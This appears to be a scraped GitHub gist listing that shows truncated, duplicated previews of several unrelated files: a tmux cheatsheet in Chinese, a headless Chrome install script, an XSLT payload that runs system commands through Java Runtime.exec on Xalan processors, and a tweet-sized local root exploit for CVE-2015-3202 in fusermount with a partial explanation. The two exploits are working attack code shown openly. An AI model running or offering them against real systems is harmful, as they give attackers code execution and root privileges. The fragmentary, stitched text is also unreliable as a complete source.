Owen Gong phith0n

## select.xslt
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template>
	<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
	<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
	<!-- #114 Utf8: open -a calculator -->
	<!-- #115 String: touch /tmp/pwn -->
	<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
	<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
	<!-- #132 Utf8: <init> -->
	<AAA select="&lt;init&gt;"/>

## tmux-cheatsheet.markdown

      
              1 file
            
          
              2 forks
            
          
                0 comments
              
            
              1 star
            
          
                phith0n
                / tmux-cheatsheet.markdown
            
            
              Created
              April 27, 2018 05:18
                — forked from ryerh/tmux-cheatsheet.markdown
            
              
                Tmux 快捷键 & 速查表
              
          
    Tmux 快捷键 & 速查表

启动新会话：
tmux [new -s 会话名 -n 窗口名]

恢复会话：
tmux at [-t 会话名]


## chrome_install_headless.sh
export CHROME_BIN=/usr/bin/google-chrome
export DISPLAY=:99.0
sh -e /etc/init.d/xvfb start
sudo apt-get update
sudo apt-get install -y libappindicator1 fonts-liberation libasound2 libgconf-2-4 libnspr4 libxss1 libnss3 xdg-utils
wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
sudo dpkg -i google-chrome*.deb

## CVE-2015-3202
# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.

12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202

# Here's how it works, $a holds the name of a shellscript to be executed as
# root.
a=/tmp/.$$;

# $b is used twice, first to build the contents of shellscript $a, and then as
	<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
	<xsl:template>
	<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
	<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
	<!-- #114 Utf8: open -a calculator -->
	<!-- #115 String: touch /tmp/pwn -->
	<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
	<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
	<!-- #132 Utf8: <init> -->
	<AAA select="<init>"/>
	export CHROME_BIN=/usr/bin/google-chrome
	export DISPLAY=:99.0
	sh -e /etc/init.d/xvfb start
	sudo apt-get update
	sudo apt-get install -y libappindicator1 fonts-liberation libasound2 libgconf-2-4 libnspr4 libxss1 libnss3 xdg-utils
	wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
	sudo dpkg -i google-chrome*.deb
	# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.

	12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
	a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202

	# Here's how it works, $a holds the name of a shellscript to be executed as
	# root.
	a=/tmp/.$$;

	# $b is used twice, first to build the contents of shellscript $a, and then as